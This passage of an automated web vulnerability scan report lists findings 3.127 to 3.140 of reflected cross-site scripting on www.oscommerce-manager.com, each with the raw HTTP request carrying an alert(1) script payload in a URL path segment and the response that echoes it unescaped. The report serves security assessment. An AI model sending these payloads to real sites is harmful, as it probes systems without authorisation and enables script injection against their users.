GET /modules/lightbox2d5d83"><script>alert(1)</script>a9586df36a6/js/auto_image_handling.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2d5d83"><script>alert(1)</script>a9586df36a6/js/auto_image_handling.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.127. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6363"><script>alert(1)</script>1aac51cff8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/jsf6363"><script>alert(1)</script>1aac51cff8/auto_image_handling.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/jsf6363"><script>alert(1)</script>1aac51cff8/auto_image_handling.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.128. http://www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/auto_image_handling.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce5"><script>alert(1)</script>83eb18f0444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/js/auto_image_handling.jsc9ce5"><script>alert(1)</script>83eb18f0444?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/js/auto_image_handling.jsc9ce5"><script>alert(1)</script>83eb18f0444?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.129. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90cd"><script>alert(1)</script>3c6d67d4f10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesd90cd"><script>alert(1)</script>3c6d67d4f10/lightbox2/js/lightbox.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modulesd90cd"><script>alert(1)</script>3c6d67d4f10/lightbox2/js/lightbox.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.130. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b61e"><script>alert(1)</script>9ae9ad7a90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox29b61e"><script>alert(1)</script>9ae9ad7a90d/js/lightbox.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox29b61e"><script>alert(1)</script>9ae9ad7a90d/js/lightbox.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.131. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c7e"><script>alert(1)</script>c193572c9b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/js74c7e"><script>alert(1)</script>c193572c9b0/lightbox.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/js74c7e"><script>alert(1)</script>c193572c9b0/lightbox.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.132. http://www.oscommerce-manager.com/modules/lightbox2/js/lightbox.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/lightbox2/js/lightbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e838b"><script>alert(1)</script>c7a2b0b1109 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/lightbox2/js/lightbox.jse838b"><script>alert(1)</script>c7a2b0b1109?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:02:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/lightbox2/js/lightbox.jse838b"><script>alert(1)</script>c7a2b0b1109?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.133. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810c9"><script>alert(1)</script>4c29409ea48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules810c9"><script>alert(1)</script>4c29409ea48/node/node.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules810c9"><script>alert(1)</script>4c29409ea48/node/node.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.134. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ffe"><script>alert(1)</script>cc6210ba8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/nodee6ffe"><script>alert(1)</script>cc6210ba8e5/node.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/nodee6ffe"><script>alert(1)</script>cc6210ba8e5/node.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.135. http://www.oscommerce-manager.com/modules/node/node.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca473"><script>alert(1)</script>135982207b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/node/node.cssca473"><script>alert(1)</script>135982207b2?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/node/node.cssca473"><script>alert(1)</script>135982207b2?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.136. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d27"><script>alert(1)</script>90d976281d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules83d27"><script>alert(1)</script>90d976281d5/system/defaults.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules83d27"><script>alert(1)</script>90d976281d5/system/defaults.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.137. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97c4"><script>alert(1)</script>d3f5fc0f678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systemd97c4"><script>alert(1)</script>d3f5fc0f678/defaults.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/systemd97c4"><script>alert(1)</script>d3f5fc0f678/defaults.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.138. http://www.oscommerce-manager.com/modules/system/defaults.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6930"><script>alert(1)</script>e13ba40e060 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system/defaults.cssb6930"><script>alert(1)</script>e13ba40e060?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/system/defaults.cssb6930"><script>alert(1)</script>e13ba40e060?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.139. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d41"><script>alert(1)</script>0b40349dd1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules57d41"><script>alert(1)</script>0b40349dd1e/system/system-menus.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules57d41"><script>alert(1)</script>0b40349dd1e/system/system-menus.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.140. http://www.oscommerce-manager.com/modules/system/system-menus.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90fb"><script>alert(1)</script>1ea0e7a080 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systemf90fb"><script>alert(1)</script>1ea0e7a080/system-menus.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
